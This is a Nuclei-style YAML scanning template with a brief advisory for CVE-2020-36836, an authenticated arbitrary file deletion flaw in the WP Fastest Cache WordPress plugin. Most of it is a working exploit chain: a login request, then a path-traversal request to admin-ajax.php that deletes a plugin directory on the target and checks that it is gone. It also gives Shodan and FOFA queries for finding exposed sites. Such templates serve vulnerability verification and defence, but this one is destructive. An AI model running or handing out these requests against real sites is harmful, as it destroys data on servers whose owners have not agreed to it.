The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
PoC代码[已公开]
id: CVE-2020-36836
info:
name: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
author: melmathari
severity: high
description: |
The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
remediation: |
Update WP Fastest Cache to version 0.9.0.3 or later to mitigate this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
- https://nvd.nist.gov/vuln/detail/CVE-2020-36836
- https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
- https://wearetradecraft.com/advisories/tc-2020-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2020-36836
cwe-id: CWE-862
epss-score: 0.19778
epss-percentile: 0.95229
cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: wpfastestcache
product: wp_fastest_cache
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev,vuln
variables:
target_path: "languages"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302 || status_code == 200'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpfc_delete_current_page_cache
matchers:
- type: dsl
dsl:
- "contains_all(body, 'The cache of page has been cleared', 'success')"
- "status_code == 200"
condition: and
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 404"
internal: true
# digest: 4a0a00473045022100849446f05c66c237a7c96e503e76441c683b677b45e502699c632926dc9176b70220081de4aec12af267c147883a503e4de299571726fba188a0c02f8c26a1288e81:922c64590222798bb761d5b6d8e72950